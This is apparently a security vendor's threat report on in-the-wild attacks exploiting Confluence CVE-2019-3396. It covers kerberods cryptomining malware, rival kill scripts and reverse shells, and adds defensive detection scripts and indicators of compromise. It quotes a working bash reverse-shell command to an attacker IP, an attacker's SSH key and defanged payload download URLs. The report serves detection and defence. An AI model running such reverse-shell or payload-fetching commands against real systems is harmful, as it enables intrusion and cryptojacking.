
An Unauthenticated RCE Gold Rush: A Look at Attacks Exploiting Confluence CVE-2019-3396

The recent Confluence vulnerability (CVE-2019-3396) created a gold rush for threat actors. Attackers are exploiting it for cryptojacking, DDoS attacks, and ransomware. We observed some of these attacks in the wild and via our honeypots. In this blog we will share interesting details from the attacks.

CVE-2019-3396

On March 20th, 2019, the vulnerability was announced; proofs of concept (PoCs) followed shortly after, then reports of unusual activity in user forums, and lastly reports of attacks exploiting the vulnerability.

CVE-2019-3396 is a critical remote code execution vulnerability in Confluence Server. Confluence is typically served on TCP port 8090, and the vulnerability can be exploited without authentication using a specially crafted HTTP POST request.

According to major Internet scan services, there are tens of thousands of Confluence servers accessible from the Internet (it is not immediately apparent, however, which of these servers are running vulnerable versions).

On April 10th, a detailed analysis of the vulnerability, including a PoC, was published. The PoC itself had appeared on GitHub almost a week earlier, on April 4th. A Metasploit module followed shortly afterwards. We first observed attacks on April 8th.

Unusual Behavior and Attack Reporting

In early April, users in the Atlassian Confluence forums began sharing details of compromises they were experiencing.

Shortly afterwards, Trend Micro published detailed blogs describing attacks they had observed.

CERN Computer Security also reported similar activity.

Based on open source reporting, it was evident that the vulnerability was being rapidly exploited. Within a short period, multiple actors and malware families were being used in the attacks.

Attack Details From Our Dataset

The first activity we observed occurred on April 8th. We found this intriguing because the detailed analysis and its PoC were published on April 10th, and the majority of the subsequent activity we observed occurred after that date. The very first post-exploitation activity we saw was the following command:

bash -i >& /dev/tcp/45.76.191.111/2012 0>&1

This sets up a reverse Bash shell to the remote IP 45.76.191.111. Based on our telemetry, little further interaction with this host appears to have occurred.
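The command above is easy to spot in process-execution telemetry because Bash's /dev/tcp pseudo-device is rarely used legitimately, the main exception being one-line port liveness checks against localhost. The following detector is an added example (not code from the original post): it scans constructed process-execution log lines, extracts the destination host and port from any /dev/tcp or /dev/udp redirection, and separates an interactive shell bound to the socket from a loopback probe. Only the first command in the sample is taken from the post; the other lines are constructed.

```python
"""Flag shell commands that wire a shell to a /dev/tcp socket.

Added example (not from the original post). The log format below is a
constructed imitation of process-execution events from a host IDS or
auditd forwarder; only the first command is quoted from the post.
"""
import re
from typing import List, NamedTuple

# Bash's /dev/tcp/<host>/<port> (and /dev/udp) pseudo-device opens an
# outbound socket; this catches ">", ">&" and "<>" redirections alike.
DEV_TCP = re.compile(r"/dev/(?:tcp|udp)/(?P<host>[^/\s]+)/(?P<port>\d{1,5})")
# An interactive shell (-i) whose stdio is being redirected to that socket.
INTERACTIVE = re.compile(r"\b(?:ba|z|k|da)?sh\s+-i\b")
LOOPBACK = {"127.0.0.1", "localhost", "::1"}


class Finding(NamedTuple):
    line_no: int
    host: str
    port: int
    interactive: bool   # shell -i bound to the socket: treat as reverse shell
    loopback: bool      # destination is the local host: likely a port probe


def scan_commands(lines: List[str]) -> List[Finding]:
    """Return one Finding per log line that opens /dev/tcp or /dev/udp."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = DEV_TCP.search(line)
        if not m:
            continue
        findings.append(Finding(
            line_no=n,
            host=m["host"],
            port=int(m["port"]),
            interactive=bool(INTERACTIVE.search(line)),
            loopback=m["host"] in LOOPBACK,
        ))
    return findings


# Constructed sample log: line 1 is the command from the post, line 3 is a
# benign local port check that uses the same pseudo-device.
SAMPLE_LOG = [
    "exec uid=1000 cmd=bash -i >& /dev/tcp/45.76.191.111/2012 0>&1",
    "exec uid=1000 cmd=java -jar confluence.jar",
    "exec uid=998 cmd=bash -c 'echo > /dev/tcp/127.0.0.1/8090'",
    "exec uid=1000 cmd=tar czf /tmp/backup.tgz /var/atlassian",
]

if __name__ == "__main__":
    for f in scan_commands(SAMPLE_LOG):
        severity = "HIGH" if f.interactive and not f.loopback else "info"
        print(f"[{severity}] line {f.line_no}: socket to {f.host}:{f.port} "
              f"interactive={f.interactive} loopback={f.loopback}")
```

In practice the same two regular expressions can be dropped into whatever rule engine consumes your process events; the interactive-and-not-loopback combination is the one worth paging on, while bare loopback probes are better logged than alerted.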

Kerberods Malware

A number of reports describe attacks involving malware named kerberods. It has been reported in both Confluence exploitation and a slightly older Jenkins exploit. The malware drops and compiles a library that provides rootkit functionality. It also drops a file named khugepageds (XMRig), which is responsible for cryptomining.

We first observed kerberods in our dataset on April 11th. It was installed via a script hosted at https://pastebin[.]com/raw/Zk7Jv9j2:

Figure 1. A snippet of the kerberods install script.

Shortly after the install, khugepageds connects to systemten[.]org:51640 for Monero (XMR) mining.

Additionally, kerberods was observed contacting the following domains:

adfsar[.]cencosud[.]com
auth[.]iws-hybrid-qa.tmicss[.]com
connect[.]vistaequitypartners[.]com
ident[.]me
monitor[.]unitq[.]com
paneltxd[.]cl
unifi[.]voltaiq-eng[.]com
www[.]clearslide[.]com
www[.]picallex[.]com
 
We assume this communication was command and control related; however, we did not observe the details. The presence of legitimate domains like www[.]clearslide[.]com was rather intriguing. The malware attempts to propagate by reading root's known_hosts file and then authenticating to the hosts found there. It also attempts to add its own SSH key.
 

Figure 2. Download snippet for public SSH key.

This SSH key was distinctive because it contained the comment “FBI@USA.GOV” which is helpful for threat actor tracking and detection:

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDZnO+F/CKFgcs1jRmWcN1bzitmSrUuvKS6OM79ywuoETUVXnp1IFxfwMlc1Ewlkd5hVPk0bE6/mX4hH2wYmO2w/TKkyKD50/v3J/rcAcsrQ3uu9opXpjFtXxm4GuXT0tt1ITf5kwevh0Xj1oqiV/2pXn9mm6uTfXafvCRM+3nWj74U0Gh+U4gyc2n3dVqgZHOZWhV6fFp5MJ9HM1bTTsREbVbvIjG2B0msAQxqRTuaLpARF3YbSu3yL7PDXjLnil5s7GihHTZlngqlu9BrvwT6LuJ0v18pdaNiSTtmw8tY+XMIuQ4H8ZuwLuBzk9XW17LVGfjrz8i5pmvruSgHX7xv FBI@USA.GOV
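The comment is a convenient hunting string, but it is also the part of an authorized_keys entry an operator can change at no cost, so a durable check should key on the fingerprint of the public key itself. The script below is an added example (not code from the original post): it joins the key blob quoted above, derives its OpenSSH-style SHA256 fingerprint, and scans constructed authorized_keys content for it, reporting whether the comment still reads FBI@USA.GOV as supporting context only. The ed25519 entry and the option-prefixed line in the sample are constructed.

```python
"""Check authorized_keys content for the kerberods public key.

Added example (not from the original post). The key blob is the one
quoted in the post; the authorized_keys contents below are constructed.
Matching is done on the SHA256 fingerprint of the decoded key, so a
changed or stripped comment does not evade the check.
"""
import base64
import hashlib
from typing import Dict, List, NamedTuple

# Key blob as published in the post, re-joined onto one line.
KERBERODS_KEY_BLOB = (
    "AAAAB3NzaC1yc2EAAAADAQABAAABAQDZnO+F/CKFgcs1jRmWcN1bzitmSrUuvKS6OM79ywu"
    "oETUVXnp1IFxfwMlc1Ewlkd5hVPk0bE6/mX4hH2wYmO2w/TKkyKD50/v3J/rcAcsrQ3uu9o"
    "pXpjFtXxm4GuXT0tt1ITf5kwevh0Xj1oqiV/2pXn9mm6uTfXafvCRM+3nWj74U0Gh+U4gyc"
    "2n3dVqgZHOZWhV6fFp5MJ9HM1bTTsREbVbvIjG2B0msAQxqRTuaLpARF3YbSu3yL7PDXjLn"
    "il5s7GihHTZlngqlu9BrvwT6LuJ0v18pdaNiSTtmw8tY+XMIuQ4H8ZuwLuBzk9XW17LVGfj"
    "rz8i5pmvruSgHX7xv"
)
KERBERODS_COMMENT = "FBI@USA.GOV"


def fingerprint(blob_b64: str) -> str:
    """OpenSSH-style fingerprint: 'SHA256:' + unpadded base64 of sha256(blob)."""
    raw = base64.b64decode(blob_b64)
    digest = base64.b64encode(hashlib.sha256(raw).digest()).decode().rstrip("=")
    return "SHA256:" + digest


# Fingerprint -> label. Extend this with other keys your environment has seen.
KNOWN_BAD: Dict[str, str] = {
    fingerprint(KERBERODS_KEY_BLOB): "kerberods (CVE-2019-3396 campaign)",
}
KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")


class Hit(NamedTuple):
    line_no: int
    fingerprint: str
    label: str
    comment: str
    comment_matches: bool


def scan_authorized_keys(text: str) -> List[Hit]:
    """Return a Hit for every entry whose key fingerprint is in KNOWN_BAD."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        # Entries may carry options (command="...",no-pty) before the key type;
        # whitespace-splitting is a simplification that still finds the type token.
        idx = next((i for i, p in enumerate(parts) if p.startswith(KEY_TYPE_PREFIXES)), None)
        if idx is None or idx + 1 >= len(parts):
            continue
        try:
            fp = fingerprint(parts[idx + 1])
        except ValueError:      # malformed base64: not a parsable key
            continue
        if fp in KNOWN_BAD:
            comment = " ".join(parts[idx + 2:])
            hits.append(Hit(n, fp, KNOWN_BAD[fp], comment, comment == KERBERODS_COMMENT))
    return hits


# Constructed authorized_keys: a benign (fake) ed25519 key, the kerberods key with its
# original comment, and the same key with options prepended and the comment swapped.
SAMPLE_AUTHORIZED_KEYS = f"""# constructed sample authorized_keys
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFakeKeyForIllustrationOnly00000000000000000 admin@bastion
ssh-rsa {KERBERODS_KEY_BLOB} {KERBERODS_COMMENT}
command="/bin/true",no-pty ssh-rsa {KERBERODS_KEY_BLOB} backup@localhost
"""

if __name__ == "__main__":
    for h in scan_authorized_keys(SAMPLE_AUTHORIZED_KEYS):
        print(f"line {h.line_no}: {h.label} {h.fingerprint} "
              f"comment={h.comment!r} original_comment={h.comment_matches}")
```

To run this against a live host, feed it the contents of /root/.ssh/authorized_keys and each user's ~/.ssh/authorized_keys; the fingerprint it prints is the same value `ssh-keygen -lf` shows for the key, so it can be compared directly with fingerprints in other reports.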

 

In later attacks, coming from a different threat actor, we observed a script downloaded from https://bitbucket[.]org/imraldf134/mygit/raw/master/zz.sh and http://193[.]57[.]40[.]46/k.sh.

The script contains logic to kill the kerberods and khugepageds processes (along with some other familiar names such as dblaunchs, watchbog, and suste):

Figure 3. A snippet of zz.sh showing a process killing for other malware families.

It appears that other attackers were quick to respond to the spread of kerberods, as this script appeared a couple of days after our first sighting of kerberods. A recent blog from Intezer highlights threat actor groups fighting over resources in the cloud.

Reverse Shell as a Service

On April 13th we observed an interesting tactic that was unrelated to kerberods. This was a connection to shell[.]now[.]sh. This domain hosts a simple reverse shell as a service. In our case it does not appear anyone successfully interacted with the shell. However, similar to the shell mentioned earlier, the idea of an interactive session following an exploit like this is interesting considering most other attacks are automated.

 

Figure 4. Landing page and usage for the reverse shell as a service at shell[.]now[.]sh.

Additional Attacks

In addition to the aforementioned activity, we observed other attacks exploiting this vulnerability. These attacks dropped malware components more or less similar to kerberods. The main functionalities observed were cryptomining, persistence, and propagation. Below is a list of additional files we saw frequently:

/tmp/.dbb/dblaunchs
/tmp/.dbb/dblaunchs_0xBB042
/tmp/[…]/watchbog
/tmp/.dba/dblaunchs_0xBB041
/tmp/.sysinfo/a319660436b4ce21b5da4fe407676ea5a
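The dropped files share two traits a responder can sweep for: known SHA256 hashes (listed under Indicators at the end of this post) and a consistent location, a hidden directory directly under /tmp. The script below is an added example (not code from the original post) that checks a host file inventory against both. The hashes and file names are the ones this post lists; the inventory and the zero-filled placeholder hashes in it are constructed.

```python
"""Match a host file inventory against the file indicators from this post.

Added example (not from the original post). The hashes and names come from
the post's Indicators section; the sample inventory is constructed, with
zero-filled placeholder digests for files whose hash is not an indicator.
Three checks are layered: exact hash, known dropper file name (so a
recompiled binary with a changed hash is still caught), and the dropper
path shape (a dot-directory directly below /tmp).
"""
import hashlib
import os
import re
from typing import Dict, List, NamedTuple

IOC_HASHES: Dict[str, str] = {
    "6e26a649c7cecae0f367e53e901529717bddce9ae5ec9dff070b8c3392c13e71": "watchbog",
    "7f52efd3d2a99475164a9413ed2d1b947129099d67c72583633cedbc6032f8e5": "dblaunchs",
    "8269773c98c259acb7d109de1c448673d1e45b3684834b19335bd42c84977e4c": "watchbog",
    "a6876c0caebfa1eacf13b8236fa64e509e1df2fe9c88b0a03eea880c8023dbcb": "dblaunchs_0xBB041",
    "c39b2db5e3d54335c5320f399212c9e073c48f001a8dd9250f711d45420d3a2a": "dblaunchs_0xBB042",
    "f882528e1ac9ca36db8354822e527c50c141aea05b6e120ff5a61e3a170ba5f9": "khugepaged",
    "92a6c2a5a70f6535bb3bfdffb3c3829ffae8a9bea380c34311e72dc0f66bcfdb": "a319660436b4ce21b5da4fe407676ea5a",
}
# Dropper file names named in the post; the _0x... suffix is stripped before comparing.
KNOWN_NAMES = {"dblaunchs", "watchbog", "khugepageds", "kerberods", "suste"}
# A file inside a hidden directory directly under /tmp, e.g. /tmp/.dbb/dblaunchs
HIDDEN_TMP_DIR = re.compile(r"^/tmp/\.[^/]+/[^/]+$")


class Match(NamedTuple):
    path: str
    reason: str


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def inventory(root: str) -> Dict[str, str]:
    """Map every regular file under root to its SHA256 (use on a live host)."""
    out: Dict[str, str] = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            p = os.path.join(dirpath, name)
            if os.path.isfile(p) and not os.path.islink(p):
                out[p] = sha256_file(p)
    return out


def match_indicators(files: Dict[str, str]) -> List[Match]:
    """Report each file that trips one of the three checks (strongest reason wins)."""
    matches = []
    for path, digest in files.items():
        digest = digest.lower()
        base_name = os.path.basename(path).split("_")[0]
        if digest in IOC_HASHES:
            matches.append(Match(path, f"hash matches {IOC_HASHES[digest]}"))
        elif base_name in KNOWN_NAMES:
            matches.append(Match(path, f"file name matches {base_name}"))
        elif HIDDEN_TMP_DIR.match(path):
            matches.append(Match(path, "file in hidden directory directly under /tmp"))
    return matches


def placeholder(n: int) -> str:
    """Constructed, obviously fake digest for sample files (not real hashes)."""
    return f"{n:064x}"


# Constructed inventory: one real indicator hash, one renamed/recompiled dropper,
# one unknown file in a hidden /tmp directory, two benign files.
SAMPLE_INVENTORY = {
    "/tmp/.dbb/dblaunchs": "7f52efd3d2a99475164a9413ed2d1b947129099d67c72583633cedbc6032f8e5",
    "/tmp/.dba/dblaunchs_0xBB041": placeholder(1),
    "/tmp/.sysinfo/report.bin": placeholder(2),
    "/tmp/hsperfdata_confluence/12345": placeholder(3),   # normal JVM perf data
    "/opt/atlassian/confluence/bin/start-confluence.sh": placeholder(4),
}

if __name__ == "__main__":
    for m in match_indicators(SAMPLE_INVENTORY):
        print(f"{m.path}: {m.reason}")
```

On a real system, replace SAMPLE_INVENTORY with `inventory("/tmp")` (and any other writable directory the web application user owns); the hidden-directory rule will also surface legitimate dot-directories, so treat it as a triage cue rather than an alert on its own.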
 
Final Thoughts

Unauthenticated remote code execution exploits against internet-facing applications create a gold rush for threat actors. In the case of the Confluence vulnerability, a few weeks passed before servers were receiving floods of automated attacks and attempts at interactive compromise. As new threat actors attempt to grab a foothold, we see install scripts battling for control of the infected hosts.

For prevalent threat actor groups, like Rocke, attacks like these are one in a larger portfolio. This may be the tip of the iceberg as it is unknown if this vulnerability is being leveraged in any targeted attacks.

This activity highlights the importance of traditional security practices such as updating, patching, and configuration auditing. Having a host IDS can also help alert on activity such as this.

If you would like to learn more about how Lacework provides workload security to detect attacks, follow this link to kick off a Free Cloud Risk & Threat Assessment to learn more.

Indicators

Files (SHA256)

6e26a649c7cecae0f367e53e901529717bddce9ae5ec9dff070b8c3392c13e71 (watchbog)
7f52efd3d2a99475164a9413ed2d1b947129099d67c72583633cedbc6032f8e5 (dblaunchs)
8269773c98c259acb7d109de1c448673d1e45b3684834b19335bd42c84977e4c (watchbog)
a6876c0caebfa1eacf13b8236fa64e509e1df2fe9c88b0a03eea880c8023dbcb (dblaunchs_0xBB041)
c39b2db5e3d54335c5320f399212c9e073c48f001a8dd9250f711d45420d3a2a (dblaunchs_0xBB042)
f882528e1ac9ca36db8354822e527c50c141aea05b6e120ff5a61e3a170ba5f9 (khugepaged)
92a6c2a5a70f6535bb3bfdffb3c3829ffae8a9bea380c34311e72dc0f66bcfdb (a319660436b4ce21b5da4fe407676ea5a)
 
IPs
104[.]238[.]151[.]101
132[.]148[.]148[.]79
166[.]62[.]38[.]167
185[.]193[.]125[.]146
193[.]57[.]40[.]46
198[.]12[.]156[.]218
45[.]76[.]191[.]111
 
Domains
1[.]z9ls[.]com
t[.]w2wz[.]cn
dd[.]heheda[.]tk
systemten[.]org
adfsar[.]cencosud[.]com
auth[.]iws-hybrid-qa.tmicss[.]com
connect[.]vistaequitypartners[.]com
ident[.]me
monitor[.]unitq[.]com
paneltxd[.]cl
unifi[.]voltaiq-eng[.]com
www[.]clearslide[.]com
www[.]picallex[.]com
shell[.]now[.]sh
 
URLs
http://1[.]z9ls[.]com/t6/701/1555231425×2918527158[.]jpg
http://1[.]z9ls[.]com/t6/701/1555238887×2728278704[.]jpg
http://1[.]z9ls[.]com/t6/701/1555298518×2918527158[.]jpg
http://1[.]z9ls[.]com/t6/701/1555302073×2918527158[.]jpg
http://1[.]z9ls[.]com/t6/701/1555396475×2918527158[.]jpg
http://104[.]238[.]151[.]101/0[.]sh
http://132[.]148[.]148[.]79/plus/java
http://132[.]148[.]148[.]79/plus/java2
http://132[.]148[.]148[.]79/plus/java3c
http://132[.]148[.]148[.]79/plus/javad
http://166[.]62[.]38[.]167/plus/cx
http://166[.]62[.]38[.]167/plus/cx[.]2
http://166[.]62[.]38[.]167/plus/java
http://166[.]62[.]38[.]167/plus/java2
http://166[.]62[.]38[.]167/plus/java3c
http://166[.]62[.]38[.]167/plus/javacf
http://166[.]62[.]38[.]167/plus/javacj
http://166[.]62[.]38[.]167/plus/javacp
http://166[.]62[.]38[.]167/plus/javad
http://166[.]62[.]38[.]167/plus/javapo
http://166[.]62[.]38[.]167/plus/kok
http://166[.]62[.]38[.]167/plus/rc9
http://166[.]62[.]38[.]167/plus/wow_cf
http://16e6734d[.]ngrok[.]io/c?r=a319660436b4ce21b5da4fe407676ea5
http://16e6734d[.]ngrok[.]io/m?o=18204&r=a319660436b4ce21b5da4fe407676ea5&t=2&l=o&u=confluence
http://185[.]193[.]125[.]146/lsd[.]sh
http://18b2f573[.]ngrok[.]io/c?r=a319660436b4ce21b5da4fe407676ea5
http://18b2f573[.]ngrok[.]io/d8/nginx
http://193[.]57[.]40[.]46/k[.]sh
http://193[.]57[.]40[.]46/mj[.]sh
http://193[.]57[.]40[.]46/rep2[.]php
http://198[.]12[.]156[.]218/plus/java
http://198[.]12[.]156[.]218/plus/java2
http://198[.]12[.]156[.]218/plus/java3c
http://198[.]12[.]156[.]218/plus/javad
http://198[.]12[.]156[.]218/plus/kok
http://2b363bfc[.]ngrok[.]io/c?r=a319660436b4ce21b5da4fe407676ea5
http://2b363bfc[.]ngrok[.]io/d8/daemon
http://2b363bfc[.]ngrok[.]io/d8/nginx
http://3678cd3f[.]ngrok[.]io/c?r=a319660436b4ce21b5da4fe407676ea5
http://426c9be3[.]ngrok[.]io/f/serve?l=o&r=a319660436b4ce21b5da4fe407676ea5
http://4765911b[.]ngrok[.]io/f/serve?l=o&r=a319660436b4ce21b5da4fe407676ea5
http://5c0e35c1[.]ngrok[.]io/f/serve?l=o&r=a319660436b4ce21b5da4fe407676ea5
http://681f224d[.]ngrok[.]io/f/serve?l=o&r=a319660436b4ce21b5da4fe407676ea5
http://6d388090[.]ngrok[.]io/c?r=a319660436b4ce21b5da4fe407676ea5
http://6d388090[.]ngrok[.]io/m?o=18204&r=a319660436b4ce21b5da4fe407676ea5&t=2&l=o&u=confluence
http://820c29ed[.]ngrok[.]io/c?r=a319660436b4ce21b5da4fe407676ea5
http://820c29ed[.]ngrok[.]io/m?o=12568&r=a319660436b4ce21b5da4fe407676ea5&t=2&l=o&u=confluence
http://9d09805e[.]ngrok[.]io/c?r=a319660436b4ce21b5da4fe407676ea5
http://9d09805e[.]ngrok[.]io/d8/daemon
http://9d09805e[.]ngrok[.]io/d8/nginx
http://9d09805e[.]ngrok[.]io/m?o=12568&r=a319660436b4ce21b5da4fe407676ea5&t=2&l=o&u=confluence
http://b13a1a66[.]ngrok[.]io/f/serve?l=o&r=a319660436b4ce21b5da4fe407676ea5
http://f6d5a7f2[.]ngrok[.]io/c?r=a319660436b4ce21b5da4fe407676ea5
http://t[.]w2wz[.]cn/t6/700/1554994491×2918527122[.]jpg
http://t[.]w2wz[.]cn/t6/700/1554995474×2890211696[.]jpg
http://t[.]w2wz[.]cn/t6/701/1555134238×2890211786[.]jpg
https://bitbucket[.]org/imraldf134/mygit/raw/master/x_64
https://bitbucket[.]org/imraldf134/mygit/raw/master/zz[.]sh
https://dd[.]heheda[.]tk/i[.]jpg
https://dd[.]heheda[.]tk/id_rsa[.]pub
https://dd[.]heheda[.]tk/x86_64-static-linux-uclibc[.]jpg
https://github[.]com/fireice-uk/xmr-stak/releases/download/2[.]10[.]3/xmr-stak-linux-2[.]10[.]3-cpu[.]tar[.]xz
https://github[.]com/xmrig/xmrig/releases/download/v2[.]14[.]0/xmrig-2[.]14[.]0-xenial-x64[.]tar[.]gz
https://github[.]com/xmrig/xmrig/releases/download/v2[.]15[.]1-beta/xmrig-2[.]15[.]1-beta-xenial-x64[.]tar[.]gz
https://pastebin[.]com/raw/0Sxacvsh
https://pastebin[.]com/raw/B3R5Unwh
https://pastebin[.]com/raw/BtwXn5qH
https://pastebin[.]com/raw/HiPxCJRS
https://pastebin[.]com/raw/KGwfArMR
https://pastebin[.]com/raw/SPG1SGPw
https://pastebin[.]com/raw/V85L9YaR
https://pastebin[.]com/raw/Zk7Jv9j2
https://pastebin[.]com/raw/aJkbTx6Y
https://pastebin[.]com/raw/hahwNEdB
https://pastebin[.]com/raw/u9PF30VQ
https://pastebin[.]com/raw/uV5Js3aa
https://pastebin[.]com/raw/v5XC0BJh
https://pastebin[.]com/raw/wDBa7jCQ
https://pastebin[.]com/raw/wR3ETdbi
https://pastebin[.]com/raw/xmxHzu5P
https://pastebin[.]com/raw/yvgxw9pG
https://pastebin[.]com/raw/zXcDajSs
https://pixeldrain[.]com/api/file/T8jt1Vsr
https://pixeldrain[.]com/api/file/jrASu-67?download
 
 
